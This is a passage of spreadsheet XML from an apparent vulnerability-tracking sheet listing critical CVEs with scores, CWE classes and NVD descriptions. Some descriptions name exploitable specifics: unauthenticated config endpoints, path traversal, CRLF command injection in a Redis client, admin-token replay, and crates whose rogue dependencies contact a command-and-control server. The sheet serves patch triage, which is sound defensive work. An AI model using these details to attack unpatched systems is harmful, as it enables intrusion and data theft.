          <t>Newly scored</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75337</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>The static resource interface /api/static/{deployKey}/ of Yu AI Code Mother v4.3 is vulnerable to path traversal. The user-controlled path is concatenated to the preview root directory without any normalization, allowing anonymous attackers to read files outside the preview root.</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75337</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75338</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>disconf (Distributed Configuration Management Platform) 2.6.36 is vulnerable to Incorrect Access Control. The config-fetching APIs /api/config/item, /api/config/file, /api/config/list and /api/config/simple/list are exposed without authentication. The LoginInterceptor explicitly whitelists these four paths, so any anonymous attacker can read every configuration item and configuration file managed by the config center.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75338</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76904</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>GeoTools is an open source Java library that provides tools for geospatial data. Starting in version 30.5 and prior to versions 33.6, 34.5, and 33.6, an SQL Injection Vulnerability is present when executing OGC Filters with PostGIS DataStore implementation: `jsonArrayContains` function; Requires PostGIS 12 or greater with a String or JSON field. For PostGIS 12 and greater `jsonArrayContains(&lt;column&gt;, &lt;pointer&gt;, &lt;value&gt;)` function writes `&lt;value&gt;` into generated SQL without escaping. Patches are available in versions 33.6, 34.5, and 33.6. No known workaround is available. To limit scope of SQL Injection the PostGIS connection pool should be configured with limited rights.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76904</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77649</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>The internment crate 0.8.7 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77649</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77650</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>The append-only-vec crate 0.1.9 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77650</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77651</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>The arrayref crate 0.3.10 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77651</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7861</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Code Injection.
This issue affects CSM (Customer Service Management): before 8.0.3.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7861</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78745</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>An issue in HiDPT/ Weyon HiDPTAndroid Hi3751V350 Hi3751V352E_DMO allows a remote attacker to execute arbitrary code via the Android Debug Bridge (ADB) daemon (adbd)</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78745</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79391</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>No authentication exists in the MQTT service of Trueview 6.0.23.4. The MQTT broker accepts client connections on TCP port 1883 without requiring authentication, allowing a remote attacker with network access to establish an MQTT session and perform unauthorized publish or subscribe operations.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79391</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R59"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S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80129</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R60"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S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80129</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80131</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R61"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S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80131</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85102</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Improper certificate trust validation during VPN negotiation in Check Point Quantum Security Gateway may allow an unauthenticated remote attacker to execute arbitrary code on the Gateway.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85102</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85103</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow in VPN certificate ASN.1 decoding may allow an unauthenticated remote attacker to execute arbitrary code on Check Point Quantum Security Management and Quantum Security Gateway systems.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85103</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85506</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
